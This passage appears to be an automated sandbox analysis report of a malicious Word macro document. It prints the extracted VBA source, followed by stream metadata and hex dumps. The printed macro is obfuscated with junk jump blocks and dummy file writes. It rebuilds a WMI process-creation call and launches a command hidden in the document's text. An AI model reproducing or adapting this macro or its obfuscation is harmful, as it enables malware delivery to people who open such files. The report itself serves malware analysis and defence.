Open "aCKLVJaH.XtEZlTZ.CLelFNHGI" For Binary As 56 'AlXCVHJ
Put #56, , cZYJwJI 'OjVXMHwrH
Close #56 'IgidHDSK
MPzbNgEEA:
Mrfzpndjp3s0k = VBA.Replace (Bnivj2ii9s31hmeej0, "qq" + ")(s2)(", Owy08cjm2ufmu)
   GoTo WFNTzBZJ
Dim IbQUAAA As String 'vAqxFfGB
Dim iJBKl As String 'mZoyGC
Open "FhCyJa.yKJBb.ijMMEFEqB" For Binary As 152 'eyDfDD
Put #152, , IbQUAAA 'OrIDw
Close #152 'lXFZIIBa
WFNTzBZJ:
GoTo fYohsF
Dim wpmyAZDbH As String 'UvkYP
Dim UWnwUuJ As String 'vNbrJWXFs
Open "eLPyC.ZdqCDyGC.QcmSHJFJl" For Binary As 155 'HNYatJbe
Put #155, , wpmyAZDbH 'oqezDBJ
Close #155 'hjploJG
fYohsF:
GoTo vaaYK
Dim sgQCI As String 'eoYuBDfBv
Dim VqytEGCGP As String 'vkuNGIJ
Open "sVsyIHHN.BqamC.SasWG" For Binary As 143 'wEBTBf
Put #143, , sgQCI 'ykZBs
Close #143 'eBYmHoiBA
vaaYK:
End Function
Function Vj_abq1qp3rat9wz()
On Error Resume Next
sh2v = Ntx3xle2gjt1.StoryRanges.Item(1)
   GoTo suyzGICEH
Dim hlWxWgB As String 'pFplgGAI
Dim EzJGE As String 'xODtDoIB
Open "EMnBm.qhzCjGG.AdplaCwr" For Binary As 173 'kKrMDZI
Put #173, , hlWxWgB 'WKjPM
Close #173 'YEKPB
suyzGICEH:
GoTo cnPZICJpM
Dim WKGKGYA As String 'goxvtQ
Dim TpbnJRCA As String 'xAmeRH
Open "qZLyIGBoG.pxIvxHQJ.ruafsIGOH" For Binary As 171 'wOOVDAGY
Put #171, , WKGKGYA 'EGGfGJEqE
Close #171 'WPxoGFBuC
cnPZICJpM:
GoTo nXQZvIEA
Dim XkQTmpt As String 'PQEtNI
Dim BjSOooFXD As String 'uNzMTBa
Open "sxxLaTTrF.HCwgq.ncoBz" For Binary As 86 'AEWoE
Put #86, , XkQTmpt 'NDQyFF
Close #86 'BIJvaADA
nXQZvIEA:
sng2 = "qq)(s2)" + "(pqq)(s2)("
E_gr5d7gii7nk = "qq)(s2)(roqq" + ")(s2)(qq)(s2)(ceq" + "q)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)("
   GoTo PtHzDC
Dim ufcruVvA As String 'OBuKICGCA
Dim TIucAHET As String 'wdtaBI
Open "OstrD.remYG.TgODSiEJw" For Binary As 130 'waqFE
Put #130, , ufcruVvA 'RIXfe
Close #130 'DwRUIBY
PtHzDC:
GoTo hBvQG
Dim LokfC As String 'AEWPOk
Dim XaCoFBkF As String 'twZWbqGC
Open "zaIoLA.TXEWrApGI.WoizH" For Binary As 239 'IZCOJ
Put #239, , LokfC 'qruEHBD
Close #239 'xMdFGb
hBvQG:
GoTo LSgRM
Dim mYHbrH As String 'wBmmODIas
Dim zMifH As String 'cBNdBKA
Open "QvCuBxUE.JkVTZJh.XniaV" For Binary As 196 'OUTVQNcP
Put #196, , mYHbrH 'OYgWDJ
Close #196 'Kufvu
LSgRM:
Ozms0qq3sojl = "qq)(s2)(:wqq)(s2)(qq)(s" + "2)(inqq)(s2)(3qq)(s2)(2qq" + ")(s2)(_qq)(s2)("
   GoTo hswrCJBk
Dim cLvjGII As String 'VwpCXLA
Dim AnoQaAEA As String 'MQFmHSAB
Open "wLbyGHRF.DHtWiADE.NZhmG" For Binary As 148 'ImBjDU
Put #148, , cLvjGII 'aRKWJBBIl
Close #148 'RvQwi
hswrCJBk:
GoTo jcwCemL
Dim UfERFpCEB As String 'mqLjGXcH
Dim PIypJ As String 'PRbiJE
Open "npKeJB.AsJFFIJ.PEOYbGOz" For Binary As 210 'YiSwI
Put #210, , UfERFpCEB 'zXveB
Close #210 'eCyDVgME
jcwCemL:
GoTo YeFQHW
Dim CLqtBBHEM As String 'cSOoJx
Dim mjcGEp As String 'WLoqEAAE
Open "Xfyzv.AwqqF.CSulDx" For Binary As 180 'zEBHCjA
Put #180, , CLqtBBHEM 'bXPvfYuDq
Close #180 'DujmQIHr
YeFQHW:
Nogf5r6twyl1 = "wqq)(s2)(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(t" + "qq)(s2)(qq)(s2)("
   GoTo GhPWABBAC
Dim PJctPBAG As String 'LXLsCICF
Dim pAOchCdIA As String 'CPbAYBF
Open "YPhnJPEH.HagGFmEIC.cyyfEHaR" For Binary As 238 'KBdNg
Put #238, , PJctPBAG 'OtsFHHIG
Close #238 'jmKdCK
GhPWABBAC:
GoTo ZJqvCII
Dim TyAVHBnfu As String 'rGZYAGA
Dim OEcMJ As String 'GWfMJkw
Open "UHYrC.GZeVBEo.SOkEIBXGV" For Binary As 165 'AjctARC
Put #165, , TyAVHBnfu 'VwqWBynDr
Close #165 'hMgWcFF
ZJqvCII:
GoTo nbTgII
Dim AtpoQEB As String 'ODJHAGEBR
Dim YEORYFEgD As String 'eOgqI
Open "aejsJk.ugJxod.tsCaOC" For Binary As 178 'pIoCjKh
Put #178, , AtpoQEB 'CjTuWXAF
Close #178 'VtriHBIDF
nbTgII:
Dha2d6vv7ph7ph_v = Zgw6mqlr7l2u51 + ChrW(Yp8t40c73pqf9j6 + wdKeyS + V0ds16izbsl_xm) + Eah7s5mir8k6q8
   GoTo pOumBJl
Dim ljRDIw As String 'TJeBj
Dim FkZyGrH As String 'pTXPAB
Open "lzFAlTr.gioDBGHB.nAGbrAU" For Binary As 216 'onwEG
Put #216, , ljRDIw 'PftIBSAvw
Close #216 'nxQwDJhLl
pOumBJl:
GoTo dvGYxIO
Dim qjEXJBwE As String 'XpVGACJB
Dim wylCIDDAH As String 'spWCdHBG
Open "DlhFJNHB.bhBvj.BSVeVFGRY" For Binary As 151 'BeGKBDhI
Put #151, , qjEXJBwE 'hZjGH
Close #151 'SEHbo
dvGYxIO:
GoTo BPUIP
Dim RntxcqJq As String 'RIxEqh
Dim RaTSTn As String 'BPXjtGAIo
Open "kLAOAG.wDTBF.VrHOCGc" For Binary As 141 'jttYD
Put #141, , RntxcqJq 'TGIyCPCt
Close #141 'LOwzHdS
BPUIP:
Ji67p3vs93zl9 = Nogf5r6twyl1 + Dha2d6vv7ph7ph_v + Ozms0qq3sojl + sng2 + E_gr5d7gii7nk
   GoTo VrYJTkgJq
Dim YenAEIAp As String 'fxyhXM
Dim UeTMXOrGT As String 'gEdnXGAB
Open "BbJaFjST.Xrzpku.uVfFAHQv" For Binary As 247 'UkbtPHpF
Put #247, , YenAEIAp 'yIpgX
Close #247 'CaHccmUPa
VrYJTkgJq:
GoTo LtmnvEE
Dim GfmhF As String 'kjvAuzEtF
Dim qiVZhCBpC As String 'fbVwYot
Open "AigvGEHIB.PPCtCYDWg.gBVHiqCD" For Binary As 103 'tedmJhA
Put #103, , GfmhF 'HpPiAJE
Close #103 'NvHuiCxB
LtmnvEE:
GoTo IWrPutAPf
Dim BTiPIcSF As String 'XTltBj
Dim FFWrACDoa As String 'LRtnIrEGf
Open "VLWvGECBE.hSxDGF.RmBdHqNjD" For Binary As 196 'UEeVHoE
Put #196, , BTiPIcSF 'LKuMAFDG
Close #196 'iSldRDWF
IWrPutAPf:
M1_71246hql8icmf = Y94cd7j9wr9jms(Ji67p3vs93zl9)
   GoTo hVZYKBKH
Dim yArxc As String 'CQcUlBY
Dim QHujBIJp As String 'rVQfbFK
Open "jGlnHJ.WuqlLbxyF.HGhglIF" For Binary As 260 'rzTvI
Put #260, , yArxc 'NqyUCa
Close #260 'aPJwL
hVZYKBKH:
GoTo PJxhq
Dim HojJPZ As String 'YDHVCICC
Dim NLiHLTcg As String 'BiIID
Open "DgRkGC.oezuIJ.QreJABJlU" For Binary As 126 'HLSxHFmB
Put #126, , HojJPZ 'WdtnHDFqJ
Close #126 'mmrHEDDH
PJxhq:
GoTo SELjDEG
Dim bqdcZF As String 'hYZyKCqA
Dim ZZTnc As String 'bXsNnAIDE
Open "KjXoEi.VPFBSHI.smiQyd" For Binary As 86 'FINeFJHJ
Put #86, , bqdcZF 'tzwDCH
Close #86 'XfuFHB
SELjDEG:
Set Jb9o1wbsdr9 = CreateObject(M1_71246hql8icmf)
   GoTo Rlclp
Dim IEMTiUEj As String 'FoPEe
Dim lYrlEWq As String 'hBmlufkDC
Open "GlzLdHXJB.ukgsrF.MzrWIEjI" For Binary As 120 'pfLrHfAD
Put #120, , IEMTiUEj 'sLTHHIdWW
Close #120 'ZLyvHz
Rlclp:
GoTo FIMZH
Dim VAZyEDXCR As String 'prwRBmAPJ
Dim iyQDTCBS As String 'VtpqX
Open "iPfhytE.BYjiXI.XRadQ" For Binary As 90 'qhIbwt
Put #90, , VAZyEDXCR 'PLFtB
Close #90 'gyHcs
FIMZH:
GoTo CAkSJ
Dim cHiYNHFqI As String 'oiKxBGHdG
Dim JrBDIm As String 'IPHiIjJHB
Open "MuBaJAqI.JJwbBIG.xcQNDHA" For Binary As 101 'KfzvA
Put #101, , cHiYNHFqI 'PhsrzJ
Close #101 'nmrXG
CAkSJ:
Bzj0r4l7ded = Mid(sh2v, (5), Len(sh2v))
   GoTo NmHsEFc
Dim zZMYCtCAX As String 'wTpIfC
Dim sutvLcBD As String 'pzbrdFE
Open "DGVxCZh.RlEFPCEb.wIwVQJJBo" For Binary As 135 'JwNLmkpXF
Put #135, , zZMYCtCAX 'jzyrJEO
Close #135 'MYcqCEL
NmHsEFc:
GoTo FQNmffWt
Dim VlqRGAP As String 'EWHNBIiJN
                                                                                                                        Dim eQxzwIAB As String 'XwQzzKI
                                                                                                                        Open "XBCgYJ.OzLWBT.wAQnUP" For Binary As 192 'PbuDaDAZ
                                                                                                                        Put #192, , VlqRGAP 'XxlPH
                                                                                                                        Close #192 'IaDEIDpI
                                                                                                                        FQNmffWt:
                                                                                                                        GoTo bsoyVGCFI
                                                                                                                        Dim yghyBIF As String 'rhJGP
                                                                                                                        Dim JGRXFCs As String 'xCaquG
                                                                                                                        Open "glqhDDI.CLTNCt.xZeqp" For Binary As 224 'skRUOHGHq
                                                                                                                        Put #224, , yghyBIF 'CgEsJ
                                                                                                                        Close #224 'gsWvFVBG
                                                                                                                        bsoyVGCFI:
                                                                                                                           GoTo DBkFIE
                                                                                                                        Dim zAnUQGvFH As String 'rjhOF
                                                                                                                        Dim SfMUAAHuE As String 'HdkzJJ
                                                                                                                        Open "pDOcllCuD.lEzLut.kKCfGuBND" For Binary As 120 'GHJdfD
                                                                                                                        Put #120, , zAnUQGvFH 'MAyDDBNI
                                                                                                                        Close #120 'yrXtA
                                                                                                                        DBkFIE:
                                                                                                                        GoTo MBalHjB
                                                                                                                        Dim JQIjO As String 'miPErfKDG
                                                                                                                        Dim rtldCJ As String 'rHFMIEG
                                                                                                                        Open "ZVPyGDo.KHVpyJEJI.kpQfJeY" For Binary As 72 'yGoQlC
                                                                                                                        Put #72, , JQIjO 'uQuAGD
                                                                                                                        Close #72 'sOIEJIDEW
                                                                                                                        MBalHjB:
                                                                                                                        GoTo mMdMmt
                                                                                                                        Dim jCSEHHF As String 'yubXaIh
                                                                                                                        Dim GLLJhAEHI As String 'uxAOGU
                                                                                                                        Open "zDQxMR.iplzr.wAjoodIF" For Binary As 121 'jZarCE
                                                                                                                        Put #121, , jCSEHHF 'VsSPJL
                                                                                                                        Close #121 'FpVuCCId
                                                                                                                        mMdMmt:
                                                                                                                        Jb9o1wbsdr9.Create Y94cd7j9wr9jms(Bzj0r4l7ded), Jib98w2i8chhr, N4enanrrzm_ja
                                                                                                                           GoTo GrdEGI
                                                                                                                        Dim OEleEeCT As String 'fVXaBt
                                                                                                                        Dim ZTXrGl As String 'zNzvOPGDA
                                                                                                                        Open "QrkQH.tOWCIP.GrDHUJ" For Binary As 191 'XdwIJh
                                                                                                                        Put #191, , OEleEeCT 'xNYzEIOEK
                                                                                                                        Close #191 'jXNDJFV
                                                                                                                        GrdEGI:
                                                                                                                        GoTo tzmsZ
                                                                                                                        Dim UWnPEFF As String 'opupRgM
                                                                                                                        Dim uRYMAlGHA As String 'TYgFHGIl
                                                                                                                        Open "LQAVC.FldzmI.oCeVXZC" For Binary As 181 'yJKoGGMCK
                                                                                                                        Put #181, , UWnPEFF 'UyRrc
                                                                                                                        Close #181 'QlIJBOHFE
                                                                                                                        tzmsZ:
                                                                                                                        GoTo NQfbJHA
                                                                                                                        Dim pXLSUvXGL As String 'YtYiEC
                                                                                                                        Dim yXjmE As String 'XPjxk
                                                                                                                        Open "xbtmGo.qIuZXGHJ.RZptvtQEG" For Binary As 127 'bxJMJC
                                                                                                                        Put #127, , pXLSUvXGL 'pXFOCJTDH
                                                                                                                        Close #127 'bKUkGluT
                                                                                                                        NQfbJHA:
                                                                                                                           GoTo ZXOpRLQFH
                                                                                                                        Dim HmbOBrAAC As String 'iFuweHbIH
                                                                                                                        Dim ZSAiDINAr As String 'DghaBJ
                                                                                                                        Open "cRxbPCb.XykXFJGA.LtZggMsGa" For Binary As 103 'ExinpI
                                                                                                                        Put #103, , HmbOBrAAC 'VPxgCoxS
                                                                                                                        Close #103 'hVRsJCyE
                                                                                                                        ZXOpRLQFH:
                                                                                                                        GoTo mfYda
                                                                                                                        Dim iqyjE As String 'hWWDUDGI
                                                                                                                        Dim omutJ As String 'ffoEJA
                                                                                                                        Open "HoPXpGBA.IwHCJMDRA.CmlzH" For Binary As 82 'shuPKMcWG
                                                                                                                        Put #82, , iqyjE 'tuqaDL
                                                                                                                        Close #82 'YYMsAjcB
                                                                                                                        mfYda:
                                                                                                                        GoTo LZRViG
                                                                                                                        Dim CIXpj As String 'FsOpdIsW
                                                                                                                        Dim uweUHDE As String 'jiKjSA
                                                                                                                        Open "OECHJGADF.eWIOVB.CjlHH" For Binary As 170 'NrwxFP
                                                                                                                        Put #170, , CIXpj 'mlYhn
                                                                                                                        Close #170 'xoPwBUFsA
                                                                                                                        LZRViG:
                                                                                                                        End Function
                                                                                                                        Function Y94cd7j9wr9jms(Sdit1klsk_3t9o5mv)
                                                                                                                        On Error Resume Next
                                                                                                                           GoTo pbMAHF
                                                                                                                        Dim ZPidFrt As String 'jqWJGRIDF
                                                                                                                        Dim rOzmqEAQ As String 'iwAgCMBM
                                                                                                                        Open "VqHUG.ZFPuZgUK.BaCFC" For Binary As 107 'ILEaPIEWu
                                                                                                                        Put #107, , ZPidFrt 'HEedAa
                                                                                                                        Close #107 'DDTfYJV
                                                                                                                        pbMAHF:
                                                                                                                        GoTo HZVSIIU
                                                                                                                        Dim diQYvIIAB As String 'qortGBHFE
                                                                                                                        Dim fRocABAt As String 'XtrWMG
                                                                                                                        Open "NhKoBJB.bXBco.DTUxEg" For Binary As 221 'PQoLBFA
                                                                                                                        Put #221, , diQYvIIAB 'KwXUfSFE
                                                                                                                        Close #221 'srKQHAJUg
                                                                                                                        HZVSIIU:
                                                                                                                        GoTo IOzIsOFA
                                                                                                                        Dim iMqHCHFJ As String 'CedXbS
                                                                                                                        Dim mKReIEI As String 'qVFxG
                                                                                                                        Open "tMHiBAq.JuMHZKNBq.cgyJFF" For Binary As 166 'AAbHHB
                                                                                                                        Put #166, , iMqHCHFJ 'zqGnII
                                                                                                                        Close #166 'zkyEFz
                                                                                                                        IOzIsOFA:
                                                                                                                        Ilf72gd2e5isgp_i = (Sdit1klsk_3t9o5mv)
                                                                                                                           GoTo khzFG
                                                                                                                        Dim fVpImB As String 'LuADIGI
                                                                                                                        Dim CjlbH As String 'aDdbIADKD
                                                                                                                        Open "NuPRDAFC.UhBsmID.EkqPGFJEG" For Binary As 180 'jKGHAcDG
                                                                                                                        Put #180, , fVpImB 'mqsdenJm
                                                                                                                        Close #180 'QlLDIAvHD
                                                                                                                        khzFG:
                                                                                                                        GoTo KMpoSNLJ
                                                                                                                        Dim LxvXa As String 'QPOFBD
                                                                                                                        Dim ZMCcDFc As String 'FiXcEr
                                                                                                                        Open "qqPeDr.wSQVWc.pJeJCC" For Binary As 198 'PQvyIgI
                                                                                                                        Put #198, , LxvXa 'usesJGDt
                                                                                                                        Close #198 'aptRP
                                                                                                                        KMpoSNLJ:
                                                                                                                        GoTo kwwmA
                                                                                                                        Dim qgkvFbl As String 'NhgHBItrc
                                                                                                                        Dim JjteHBBVA As String 'KKQcfh
                                                                                                                        Open "FgtNVBC.LAhZJM.HJpZQ" For Binary As 126 'EWzTDA
                                                                                                                        Put #126, , qgkvFbl 'ljrRDq
                                                                                                                        Close #126 'tauleK
                                                                                                                        kwwmA:
                                                                                                                        J6sy08nwwbjsyvunu = Mrfzpndjp3s0k(Ilf72gd2e5isgp_i)
                                                                                                                           GoTo yKflP
                                                                                                                        Dim TbyMA As String 'ScQwUADE
                                                                                                                        Dim uuXLMGBEg As String 'ZUcAJ
                                                                                                                        Open "ufMYp.QtEuJ.OwOyxH" For Binary As 132 'BSjLEB
                                                                                                                        Put #132, , TbyMA 'QpqEJ
                                                                                                                        Close #132 'zOlqpiBE
                                                                                                                        yKflP:
                                                                                                                        GoTo UcOAeq
                                                                                                                        Dim jzcemJ As String 'vhHjyA
                                                                                                                        Dim bTmHFI As String 'cvsnImpIJ
                                                                                                                        Open "HDCkBsF.dMGCBEF.ufLRD" For Binary As 157 'DXJjIaXwC
                                                                                                                        Put #157, , jzcemJ 'TYAPZ
                                                                                                                        Close #157 'BWcEdTac
                                                                                                                        UcOAeq:
                                                                                                                        GoTo kydQU
                                                                                                                        Dim MQmKFAAtE As String 'jsozCGAK
                                                                                                                        Dim ZldpVI As String 'evZsEG
                                                                                                                        Open "nOQNGhA.FYVFJ.bklIA" For Binary As 150 'yKykIcM
                                                                                                                        Put #150, , MQmKFAAtE 'gOnoJFf
                                                                                                                        Close #150 'WUTNECA
                                                                                                                        kydQU:
                                                                                                                        Y94cd7j9wr9jms = J6sy08nwwbjsyvunu
                                                                                                                           GoTo URTAHB
                                                                                                                        Dim oqOQrACK As String 'QwSTRP
                                                                                                                        Dim fZLyN As String 'gJqSCzGP
                                                                                                                        Open "KmgdV.ZGtAJHtj.ONGSH" For Binary As 237 'tADwHZ
                                                                                                                        Put #237, , oqOQrACK 'nuuGL
                                                                                                                        Close #237 'ByOiG
                                                                                                                        URTAHB:
                                                                                                                        GoTo aopzzCP
                                                                                                                        Dim RjcPJ As String 'FgyIBEFDC
                                                                                                                        Dim RdYqcFDJ As String 'SEVxED
                                                                                                                        Open "MmewC.AVQUDGmHG.vtFSCPB" For Binary As 136 'OSjhX
                                                                                                                        Put #136, , RjcPJ 'rnAWH
                                                                                                                        Close #136 'HwfPAHH
                                                                                                                        aopzzCP:
                                                                                                                        GoTo eLkJvFE
                                                                                                                        Dim LwWkX As String 'cZkrDE
                                                                                                                        Dim WrCtJYU As String 'DRUvDhBe
                                                                                                                        Open "xRrfF.YqkEzRF.kLUPqyCFD" For Binary As 48 'XXZdqPuA
                                                                                                                        Put #48, , LwWkX 'lRHQDomqI
                                                                                                                        Close #48 'FFDZEEwAF
                                                                                                                        eLkJvFE:
                                                                                                                        End Function
                                                                                                                        VBA File Name: U2v6aydkxz3, Stream Size: 1163
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/U2v6aydkxz3
                                                                                                                        VBA File Name:U2v6aydkxz3
                                                                                                                        Stream Size:1163

VBA Code Keywords: False, VB_Exposed, Attribute, VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "U2v6aydkxz3"
                                                                                                                        Attribute VB_Base = "0{9EF41C7F-4993-4380-9AE2-6D1717463F09}{19CB9157-FC90-46F3-9DB5-DA54BE1A1A95}"
                                                                                                                        Attribute VB_GlobalNameSpace = False
                                                                                                                        Attribute VB_Creatable = False
                                                                                                                        Attribute VB_PredeclaredId = True
                                                                                                                        Attribute VB_Exposed = False
                                                                                                                        Attribute VB_TemplateDerived = False
                                                                                                                        Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Y6lmxng9ukvy69c, Stream Size: 1167
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/Y6lmxng9ukvy69c
                                                                                                                        VBA File Name:Y6lmxng9ukvy69c
                                                                                                                        Stream Size:1167
                                                                                                                        Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 90 4c 1b 11 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Y6lmxng9ukvy69c"
                                                                                                                        Attribute VB_Base = "0{E341BE8E-52D5-48DE-84A6-3AE19C883DEE}{F6993466-D5CC-4E31-AC79-155044703F1F}"
                                                                                                                        Attribute VB_GlobalNameSpace = False
                                                                                                                        Attribute VB_Creatable = False
                                                                                                                        Attribute VB_PredeclaredId = True
                                                                                                                        Attribute VB_Exposed = False
                                                                                                                        Attribute VB_TemplateDerived = False
                                                                                                                        Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Z4lx7rwdfqe, Stream Size: 1161
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/Z4lx7rwdfqe
                                                                                                                        VBA File Name:Z4lx7rwdfqe
                                                                                                                        Stream Size:1161
                                                                                                                        Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . L . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 90 4c 95 34 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Z4lx7rwdfqe"
                                                                                                                        Attribute VB_Base = "0{D653B320-315E-4E0C-911D-6D22FF9BBBB9}{4825E711-FDA9-4AF6-8927-627BF1AB5E27}"
                                                                                                                        Attribute VB_GlobalNameSpace = False
                                                                                                                        Attribute VB_Creatable = False
                                                                                                                        Attribute VB_PredeclaredId = True
                                                                                                                        Attribute VB_Exposed = False
                                                                                                                        Attribute VB_TemplateDerived = False
                                                                                                                        Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Y6lmxng9ukvy69c, Stream Size: -1
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Y6lmxng9ukvy69c
                                                                                                                        VBA File Name:Y6lmxng9ukvy69c
                                                                                                                        Stream Size:-1
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Y6lmxng9ukvy69c"
                                                                                                                        Attribute VB_Base = "0{E341BE8E-52D5-48DE-84A6-3AE19C883DEE}{F6993466-D5CC-4E31-AC79-155044703F1F}"
                                                                                                                        Attribute VB_GlobalNameSpace = False
                                                                                                                        Attribute VB_Creatable = False
                                                                                                                        Attribute VB_PredeclaredId = True
                                                                                                                        Attribute VB_Exposed = False
                                                                                                                        Attribute VB_TemplateDerived = False
                                                                                                                        Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Z4lx7rwdfqe, Stream Size: -1
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Z4lx7rwdfqe
                                                                                                                        VBA File Name:Z4lx7rwdfqe
                                                                                                                        Stream Size:-1
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Z4lx7rwdfqe"
                                                                                                                        Attribute VB_Base = "0{D653B320-315E-4E0C-911D-6D22FF9BBBB9}{4825E711-FDA9-4AF6-8927-627BF1AB5E27}"
                                                                                                                        Attribute VB_GlobalNameSpace = False
                                                                                                                        Attribute VB_Creatable = False
                                                                                                                        Attribute VB_PredeclaredId = True
                                                                                                                        Attribute VB_Exposed = False
                                                                                                                        Attribute VB_TemplateDerived = False
                                                                                                                        Attribute VB_Customizable = False

                                                                                                                        Streams

                                                                                                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 121
                                                                                                                        General
                                                                                                                        Stream Path:\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:121
                                                                                                                        Entropy:4.36374049783
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F ' . . . M i c r o s o f t O f f i c e W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 27 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                        General
                                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                                        File Type:data
                                                                                                                        Stream Size:4096
                                                                                                                        Entropy:0.24979504615
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ; . . . . . . . y s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 500
                                                                                                                        General
                                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                                        File Type:data
